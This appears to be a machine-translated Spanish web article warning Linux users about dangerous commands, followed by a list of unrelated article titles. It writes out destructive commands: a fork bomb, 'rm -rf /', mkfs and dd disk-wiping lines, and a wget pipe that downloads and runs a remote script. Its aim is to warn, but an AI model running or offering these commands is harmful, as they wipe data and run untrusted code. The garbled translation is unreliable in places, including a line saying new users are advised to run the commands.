El comando de shell /terminal de Linux es muy poderoso, e incluso un comando simple puede hacer que se eliminen carpetas, archivos o carpetas de ruta.
En algunos casos, Linux ni siquiera le pedirá que ejecute comandos directamente, lo que le hará perder todo tipo de datos.
En general, se recomienda a los nuevos usuarios de Linux que ejecuten estos comandos en la Web. Por supuesto, algunas personas que han escrito este código no lo creen, porque no es una broma cuando lo escribes.
Aquí he recopilado algunos códigos de Linux que son perjudiciales para el sistema para ayudarlo a evitarlos. Recuerde: estos códigos son muy peligrosos e incluso pueden modificarse para volverse más dañinos.
Hay algunas cosas que se deben tener en cuenta: algunos comandos solo son perjudiciales si tienen un prefijo sudo en Ubuntu. Otras distribuciones de Linux son dañinas cuando se usan como comandos de raíz.
1. Linux Fork Bomb Command
: () {:: &};: Conocido como Fork Bomb, es una denegación de servicio Atacando el sistema linux. : () {:: &};: es una función de bash. Mientras se ejecute, lo repetirá hasta que el sistema se congele.
Solo puedes reiniciar el sistema para resolver este problema. Así que asegúrese de prestar atención cuando ejecute este comando en la interfaz de Linux.
2. Mv Folder /Dev /Null Command
mv folder /dev /null también es un comando peligroso. Dev /null o null device es un archivo de dispositivo que elimina todos los datos escritos en este archivo de dispositivo, pero el indicador de operación es una operación de escritura exitosa. Esto es lo que solemos decir a menudo es un agujero negro.
3. Comando Rm -Rf
El comando rm -rf puede eliminar rápidamente las carpetas y su contenido en los sistemas Linux. Si no sabes cómo usarlo correctamente, simplemente lloras.
Enumere las combinaciones y opciones más comunes para el comando m-rf:
comando rm: elimine archivos del sistema Linux
comando rm -f: elimine archivos sin preguntar Archivo de solo lectura en el comando
rm -r para eliminar los contenidos de la carpeta
comando rm -d: eliminar directorios vacíos, si el directorio no está vacío, la operación no se realizará
rm -rf /command: fuerza la eliminación de todos los comandos de contenido y subcarpetas (incluidos los archivos protegidos contra escritura) en el directorio raíz.
rm -rf * comando: fuerza la eliminación de todo el contenido en el directorio actual (directorio de trabajo actual) y carpeta de palabras
rm -rf. comando: fuerza la eliminación del directorio /subdirectorio de la carpeta actual Todo en el contenido. Igual que rm -r. [^.] *
El comando rm -r. [^.] *: Eliminar archivos y carpetas con indicaciones de eliminación
4. Comando Mkfs
Si no conoce la función de mkfs, entonces también es un comando peligroso. Cualquier comando escrito después de mkfs será formateado por un sistema de archivos de Linux en blanco. Alternativa
A continuación se enumeran los comandos que requieren privilegios de administrador para formatear el disco duro:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos mkfs.reiserfs
mkfs.vfat
mkfs.cramfs también se puede hacer con el código anterior Lo mismo, pero no necesita administrar permisos de código fuente.
5. Tar Bomb
El comando tar se utiliza para colocar varios archivos en un archivo (archivo) en formato .tar. La bomba Tape Archive (Tar) puede ser creada por él.
Cuando se comprime, este archivo de archivo genera decenas de miles de archivos con nombres similares que aparecen en el directorio actual en lugar del nuevo.
Cuando reciba un archivo tar, cree periódicamente un nuevo directorio protegido y luego coloque el archivo tar aceptado en este directorio antes de descomprimirlo, puede evitar ser víctima de la bomba tar.
6. Comando Dd
El comando Dd? se usa para copiar &cambiar la partición del disco duro. Si usas el lugar equivocado, entonces es muy peligroso.
Los siguientes comandos de dd están listados:
dd if = /dev /hda of = /dev /hdb
dd if = /dev /hda of = /dev /sdb < Br>
dd if = algo de = /dev /hda
dd if = algo de = /dev /sda
El siguiente comando borrará todo el disco duro maestro: dd si = /dev /cero de = /dev /had
7. Shell Script Code
A veces puede que te encuentres con un pit, Le proporciona un archivo de script de shell que le permite descargarlo y ejecutarlo. El script puede contener algún código malicioso o peligroso. El formulario de comando podría verse así: wget http: //some_malicious_source -O- sh. Wget descargará el script cuando sh sea angosto.
8. Código fuente malicioso
Tal vez alguien te dé el código fuente para compilarlo. El código puede ser un código normal, pero hay algunos códigos maliciosos que se enmascaran en un código fuente grande, y si es así, su sistema está filmado. ¿Cómo evitar? Solo acepte y compile el código fuente para fuentes confiables.
9. Bomba de descompresión
Ha recibido un archivo comprimido y se le solicita que extraiga este archivo pequeño, que puede ser pequeño A KB. De hecho, este pequeño archivo comprimido contiene datos altamente comprimidos.
Mientras se descompriman los archivos, se extraerán cientos de GB de datos. En este momento, si los datos de gran tamaño llenan el disco duro y causan el tiempo de inactividad, las posibilidades son grandes. ¿Cómo evitar? Aún el viejo dicho, no se preocupe, qué archivos se reciben, por favor reciba el texto fuente confiable.
Este artículo enlaza: http://www.evget.com/article/2014/11/4/21781. Html
La siguiente carpeta en el escritorio se comparte como una carpeta compartida para el siste
Primero encuentre el archivo de iptables Generalmente en /etc /sysconfig Luego vi iptab
Primero, el software del paquete de instalación Aquí hay algunos necesarios, adjuntaré el
Como ingeniero de operaciones y mantenimiento de red, si administra más enrutamiento y dispositivos
Ubuntu actualizar kernel switch kernel boot
Sistema Linux - intercambio de archivos
Obtenga información de la CPU bajo Linux
Linux modificó el nombre de host de dos maneras
Inicie varios comandos para ejecutar los comandos y programas correspondientes en linux
Linux ITDB + LDAP implementa las funciones que ITDB importa al usuario de LDAP
¿El usuario del conmutador raíz del host de Linux obtiene $? Caso de excepción de resultado
Datos de la consola del proceso del daemon de acceso de Linux
Instalación de Windows 7 partición oculta de construcción propia gran secreto
Cómo habilitar la aceleración de DirectDraw en el sistema WinXP
Al recuperar la "Papelera de reciclaje"
La partición del sistema no tiene letra de unidad. Todavía puede acceder al archivo
Vea el sitio web de regalos de CFS2015 Live Draw Wins
Crear un nuevo bosque o dominio de Active Directory
win10 win10 Descargar previsualización 14267 14267 descarga oficial refleja 64
Cómo crear una cuenta de administrador en el sistema win7
El navegador de sistema operativo Lenovo notebook win7 IE no se abre normalmente cómo hacerlo